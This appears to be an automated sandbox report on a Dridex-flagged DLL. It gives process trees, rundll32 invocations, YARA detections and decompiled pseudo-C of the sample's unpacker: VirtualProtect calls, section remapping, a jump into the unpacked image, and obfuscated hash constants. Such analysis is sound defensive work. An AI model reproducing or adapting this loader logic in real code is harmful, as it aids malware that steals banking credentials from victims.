Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5852 Parent PID: 4860

General

Start time:	21:44:53
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 788
Imagebase:	0xa80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5168 Parent PID: 5980

General

Start time:	21:44:55
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',DllCanUnloadNow
Imagebase:	0x1c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000010.00000002.489951685.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4788 Parent PID: 5980

General

Start time:	21:44:55
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',DllGetClassObject
Imagebase:	0x1c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000011.00000002.489294314.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5188 Parent PID: 5980

General

Start time:	21:44:56
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',WdiAddFileToInstance
Imagebase:	0x1c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000012.00000002.486848351.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5204 Parent PID: 5980

General

Start time:	21:44:57
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',WdiAddParameter
Imagebase:	0x1c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000013.00000002.488379155.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5220 Parent PID: 5980

General

Start time:	21:44:57
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',WdiCancel
Imagebase:	0x1c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000014.00000002.480983725.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4240 Parent PID: 5168

General

Start time:	21:46:10
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 752
Imagebase:	0xa80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 1760 Parent PID: 5188

General

Start time:	21:46:10
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 756
Imagebase:	0xa80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 3492 Parent PID: 4788

General

Start time:	21:46:11
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 760
Imagebase:	0xa80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5172 Parent PID: 5204

General

Start time:	21:46:11
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 756
Imagebase:	0xa80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5980 Parent PID: 5684 loaddll32.exeCOMMON

Executed Functions

Function 0137193D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0137193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				char* _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				int _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr* _t135;
				int _t142;
				int _t150;
				int _t154;
				intOrPtr _t169;
				int _t175;
				intOrPtr _t217;
				void* _t224;
				intOrPtr _t227;
				void* _t234;
				intOrPtr _t238;
				intOrPtr _t245;
				intOrPtr _t249;
				DWORD* _t263;
				void* _t267;
				intOrPtr* _t270;
				intOrPtr* _t271;

				_t135 = _a4;
				_v20 = 0;
				_t234 =  *((intOrPtr*)(_t135 + 0x28));
				 *0x1374418 = 1;
				asm("movaps xmm0, [0x1373010]");
				asm("movups [0x1374428], xmm0");
				_v48 = _t135;
				_v52 =  *((intOrPtr*)(_t135 + 0x44));
				_v56 =  *((intOrPtr*)(_v48 + 0xc));
				_v180 = _t234;
				_v176 =  *((intOrPtr*)(_v48 + 0x48));
				_v172 = 4;
				_v168 =  &_v20;
				_v60 =  *((intOrPtr*)(_t135 + 0x30));
				_v64 = 4;
				_v68 = _t234;
				_v72 =  &_v20;
				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
				_v76 = _t142;
				_v180 = _v68;
				_v176 = 0;
				_v172 =  *((intOrPtr*)(_v48 + 0x48));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E0137173B();
				E013721C2(_v68,  *_v48, _v60);
				E0137173B( *_v48, 0, _v60);
				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t270 = _t267 - 0x84;
				_t224 = _v68;
				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
				_v96 = _t150;
				_v100 = _v68 + 0x3c;
				_v104 = _t224;
				_v108 = _t249;
				if(_t249 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v56 != 0) {
					_v116 = 0;
					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t169 = _v120;
						_v152 = _t169;
						_t245 = _v152;
						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
						_v176 =  *((intOrPtr*)(_t245 + 8));
						_v172 =  *((intOrPtr*)(0x1374418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v168 =  &_v20;
						_v156 = _v116;
						_t175 = VirtualProtect(??, ??, ??, ??); // executed
						_t270 = _t270 - 0x10;
						_t217 = _v156 + 1;
						_v160 = _t175;
						_v116 = _t217;
						_v120 = _v152 + 0x28;
						if(_t217 == _v56) {
							goto L12;
						}
					}
				}
				L12:
				 *_t270 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
				_t154 = DisableThreadLibraryCalls(??);
				_t271 = _t270 - 4;
				_t227 =  *_v100;
				_v164 = _t154;
				_v124 = _t227;
				_v128 = _v68;
				if(_t227 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t238 = _v48;
				_v44 =  *((intOrPtr*)(_t238 + 0x40));
				_v40 =  *((intOrPtr*)(_t238 + 0x24));
				_v36 =  *((intOrPtr*)(_t238 + 0x38));
				_v32 =  *((intOrPtr*)(_t238 + 0x50));
				_v28 =  *((intOrPtr*)(_t238 + 0x18));
				_v24 = _v132;
				 *_t271 = _t238;
				_v180 = 0;
				_v176 = 0x5c;
				_v136 =  &_v44;
				_v140 = 0;
				_v144 = 0x5c;
				_v148 =  *((intOrPtr*)(_v128 + 0x28));
				E0137173B();
				if(_v148 != 0) {
					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x01371949
0x01371957
0x0137195e
0x01371961
0x0137196b
0x01371972
0x0137197c
0x01371982
0x0137198b
0x01371994
0x01371997
0x0137199b
0x013719a3
0x013719aa
0x013719ad
0x013719b0
0x013719b3
0x013719b6
0x013719d0
0x013719d6
0x013719d9
0x013719e1
0x013719e5
0x013719e8
0x013719eb
0x013719ee
0x013719f1
0x01371a0c
0x01371a28
0x01371a4d
0x01371a4f
0x01371a58
0x01371a5b
0x01371a65
0x01371a68
0x01371a6b
0x01371a6e
0x01371a71
0x01371a8c
0x01371a8c
0x01371b76
0x01371b79
0x01371aa5
0x01371aa8
0x01371b84
0x01371b84
0x01371b9b
0x01371bc3
0x01371bcf
0x01371bd2
0x01371bd6
0x01371bda
0x01371be1
0x01371be7
0x01371be9
0x01371bf2
0x01371c03
0x01371c09
0x01371c0c
0x01371c0f
0x00000000
0x00000000
0x01371c11
0x01371b84
0x01371c31
0x01371c3f
0x01371c47
0x01371c4a
0x01371c4c
0x01371c52
0x01371c5e
0x01371c64
0x01371c67
0x01371c6a
0x01371ae4
0x01371ae4
0x01371af7
0x01371afd
0x01371b03
0x01371b09
0x01371b0f
0x01371b15
0x01371b1b
0x01371b1e
0x01371b21
0x01371b29
0x01371b31
0x01371b37
0x01371b3d
0x01371b43
0x01371b49
0x01371b57
0x01371c24
0x01371c2a
0x01371c2a
0x01371ac9

APIs

VirtualProtect.KERNELBASE ref: 013719B6
VirtualProtect.KERNELBASE ref: 01371A4D
VirtualProtect.KERNELBASE ref: 01371BE7

Strings

\, xrefs: 01371B29

Memory Dump Source

Source File: 00000000.00000002.583492087.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 49630d9f847af8d9fb7d49d03d288688eba77969df4846f567cc919cf78bfdba
Instruction ID: 5c86b5ba30dd41722ec5c856636780184630f18c7e60b0fb30405a85b9bb697c
Opcode Fuzzy Hash: 49630d9f847af8d9fb7d49d03d288688eba77969df4846f567cc919cf78bfdba
Instruction Fuzzy Hash: DFB1CBB5E002198FDB14CFA9C980A9DFBF1BF88314F15856AE958AB351D334A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01371C7F, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 01371D80

Memory Dump Source

Source File: 00000000.00000002.583492087.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
Instruction ID: dce635a442256e40eb395ed93d7d7ec9ef450afb1babceab656bcc40347cda1d
Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
Instruction Fuzzy Hash: 4D41B0B5E0421A9FDB44DFA8C4906AEFBF1BF48714F14852DE948AB340D379A881CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 4088 Parent PID: 5984 rundll32.exeCOMMON

Executed Functions

Function 10001494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 32%

			E10001494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				char _v56;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				void* __ebp;
				void* _t282;
				void* _t286;
				intOrPtr* _t310;
				signed char _t312;
				intOrPtr* _t319;
				intOrPtr* _t435;
				intOrPtr* _t481;
				void* _t482;

				_t482 = __eflags;
				_t481 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E1000F5A8( &_v72, 0);
				_v60 = 0x790529cb;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v76, E1000F4F0( &_v76) + 0x10);
				E1000F4E0( &_v80, E1000F4F0( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t326 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0xdee5e4fb;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v84, E1000F4F0(_t326) + 0x10);
				E1000F4E0( &_v88, E1000F4F0( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t330 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xeabbe5b1;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v92, E1000F4F0(_t330) + 0x10);
				E1000F4E0( &_v96, E1000F4F0( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t334 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x9a85f5ac;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v100, E1000F4F0(_t334) + 0x10);
				E1000F4E0( &_v104, E1000F4F0( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t338 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0x93251419;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v108, E1000F4F0(_t338) + 0x10);
				E1000F4E0( &_v112, E1000F4F0( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t342 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x26dec0d0;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v116, E1000F4F0(_t342) + 0x10);
				E1000F4E0( &_v120, E1000F4F0( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t346 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xa7a69cc6;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v124, E1000F4F0(_t346) + 0x10);
				E1000F4E0( &_v128, E1000F4F0( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t350 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x1a9c1df5;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v132, E1000F4F0(_t350) + 0x10);
				E1000F4E0( &_v136, E1000F4F0( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t354 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x77fa1d17;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v140, E1000F4F0(_t354) + 0x10);
				E1000F4E0( &_v144, E1000F4F0( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t358 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xabb27594;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v148, E1000F4F0(_t358) + 0x10);
				E1000F4E0( &_v152, E1000F4F0( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t362 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xfe904c4d;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v156, E1000F4F0(_t362) + 0x10);
				E1000F4E0( &_v160, E1000F4F0( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t366 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0xde72067;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v164, E1000F4F0(_t366) + 0x10);
				E1000F4E0( &_v168, E1000F4F0( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t370 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x82fffbdc;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v172, E1000F4F0(_t370) + 0x10);
				E1000F4E0( &_v176, E1000F4F0( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t374 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0xdb278333;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v180, E1000F4F0(_t374) + 0x10);
				E1000F4E0( &_v184, E1000F4F0( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t378 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0xc380629b;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v188, E1000F4F0(_t378) + 0x10);
				E1000F4E0( &_v192, E1000F4F0( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t382 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0xd5e26663;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v196, E1000F4F0(_t382) + 0x10);
				E1000F4E0( &_v200, E1000F4F0( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t386 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0xc09bf2f8;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v204, E1000F4F0(_t386) + 0x10);
				E1000F4E0( &_v208, E1000F4F0( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t435 = _t481;
				 *_t435 =  *_t435 + 1;
				E100141D8(0xfe338407, _t435);
				E1000F4E0( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E1000F4E0( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E1000F4E0( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E1000F4E0( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E1000F4E0( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E1000F4E0( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E1000F4E0( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E1000F4E0( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E1000F4E0( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E1000F4E0( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E1000F4E0( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E1000F4E0( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E1000F4E0( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E1000F4E0( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E1000F4E0( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E1000F4E0( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E1000F4E0( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E10001D2C(_v248, _t435, _t482, _t282, _t282);
				_t319 = _t435;
				E1000B2C0( &_v248, _v256, _t482, _v252, _t319);
				E1000F864( &_v296, _t482);
				_v300 = 0;
				_t411 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xa09bf9c8;
				asm("movq [ecx+0x18], xmm0"); // executed
				_t286 = E1000F4F0(_t411); // executed
				E1000F84C( &_v296, _t286 + 0x10);
				E1000F4E0( &_v300, E1000F4F0( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t415 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x2b5b930c;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v304, E1000F4F0(_t415) + 0x10);
				E1000F4E0( &_v308, E1000F4F0( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t419 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x453267ca;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v312, E1000F4F0(_t419) + 0x10);
				E1000F4E0( &_v316, E1000F4F0( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t423 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xb38fc5b8;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v320, E1000F4F0(_t423) + 0x10);
				E1000F4E0( &_v324, E1000F4F0( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t481 =  *_t481 + 1;
				_t310 = _t481;
				_push(_t310);
				_push(_t319);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E1000BA40(_t154,  *_t481);
				_t312 = E1000F4E0( &_v340, 0);
				 *(_t312 & 0x000000d8) =  *(_t312 & 0x000000d8) + _t313;
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E1000F4E0( &_v84, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E1000F4E0( &_v88, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E1000F4E0( &_v92, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E1000F678( &_v56);
				return E1000F678( &_v96);
			}

0x10001494
0x10001498
0x1000149d
0x100014a3
0x100014ab
0x100014b0
0x100014bc
0x100014c0
0x100014d2
0x100014e8
0x100014f3
0x100014f4
0x100014f5
0x100014f6
0x100014f7
0x100014fa
0x100014fe
0x10001502
0x10001509
0x1000151b
0x10001531
0x1000153c
0x1000153d
0x1000153e
0x1000153f
0x10001540
0x10001543
0x10001547
0x1000154b
0x10001552
0x10001564
0x1000157a
0x10001585
0x10001586
0x10001587
0x10001588
0x10001589
0x1000158c
0x10001590
0x10001594
0x1000159b
0x100015ad
0x100015c3
0x100015ce
0x100015cf
0x100015d0
0x100015d1
0x100015d2
0x100015d5
0x100015d9
0x100015dd
0x100015e4
0x100015f6
0x1000160c
0x10001617
0x10001618
0x10001619
0x1000161a
0x1000161b
0x1000161e
0x10001622
0x10001626
0x1000162d
0x1000163f
0x10001655
0x10001660
0x10001661
0x10001662
0x10001663
0x10001664
0x10001667
0x1000166b
0x1000166f
0x10001676
0x10001688
0x1000169e
0x100016a9
0x100016aa
0x100016ab
0x100016ac
0x100016ad
0x100016b0
0x100016b4
0x100016b8
0x100016bf
0x100016d1
0x100016e7
0x100016f2
0x100016f3
0x100016f4
0x100016f5
0x100016f6
0x100016f9
0x100016fd
0x10001701
0x10001708
0x1000171a
0x10001730
0x1000173b
0x1000173c
0x1000173d
0x1000173e
0x1000173f
0x10001742
0x10001746
0x1000174a
0x10001751
0x10001763
0x10001779
0x10001784
0x10001785
0x10001786
0x10001787
0x10001788
0x1000178b
0x1000178f
0x10001793
0x1000179a
0x100017ac
0x100017c2
0x100017cd
0x100017ce
0x100017cf
0x100017d0
0x100017d1
0x100017d4
0x100017d8
0x100017dc
0x100017e3
0x100017f5
0x1000180b
0x10001816
0x10001817
0x10001818
0x10001819
0x1000181a
0x1000181d
0x10001821
0x10001825
0x1000182c
0x1000183e
0x10001854
0x1000185f
0x10001860
0x10001861
0x10001862
0x10001863
0x10001866
0x1000186a
0x1000186e
0x10001875
0x10001887
0x1000189d
0x100018a8
0x100018a9
0x100018aa
0x100018ab
0x100018ac
0x100018af
0x100018b3
0x100018b7
0x100018be
0x100018d0
0x100018e6
0x100018f1
0x100018f2
0x100018f3
0x100018f4
0x100018f5
0x100018f8
0x100018fc
